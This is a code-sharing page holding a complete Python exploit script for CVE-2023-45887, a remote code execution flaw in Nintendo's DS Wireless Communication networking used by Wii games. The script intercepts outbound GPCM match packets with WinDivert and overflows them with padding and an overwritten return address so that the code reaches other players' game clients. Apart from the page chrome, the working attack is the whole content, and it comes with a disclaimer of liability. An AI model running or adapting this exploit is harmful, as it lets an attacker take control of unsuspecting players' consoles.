扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
# Exploit Title: DS Wireless Communication Remote Code Execution # Date: 11 Oct 2023 # Exploit Author: MikeIsAStar # Vendor Homepage: https://www.nintendo.com # Version: Unknown # Tested on: Wii # CVE: CVE-2023-45887 """This code will inject arbitrary code into a client's game. You are fully responsible for all activity that occurs while using this code. The author of this code can not be held liable to you or to anyone else as a result of damages caused by the usage of this code. """ import re import sys try: import pydivert except ModuleNotFoundError: sys.exit("The 'pydivert' module is not installed !") # Variables LR_SAVE = b'\x41\x41\x41\x41' assert len(LR_SAVE) == 0x04 PADDING = b'MikeStar' assert len(PADDING) > 0x00 # Constants DWC_MATCH_COMMAND_INVALID = b'\xFE' PADDING_LENGTH = 0x23C FINAL_KEY = b'\\final\\' WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0' def try_modify_payload(payload): message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT' message = re.search(message_pattern, payload) if not message: return None payload = payload[:message.end()] payload += DWC_MATCH_COMMAND_INVALID payload += (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH] payload += LR_SAVE payload += FINAL_KEY return payload def main(): try: with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer: for packet in packet_buffer: payload = try_modify_payload(packet.payload) if payload is not None: print('Modified a GPCM message !') packet.payload = payload packet_buffer.send(packet) except KeyboardInterrupt: pass except PermissionError: sys.exit('This program must be run with administrator privileges !') if __name__ == '__main__': main() |
体验盒子
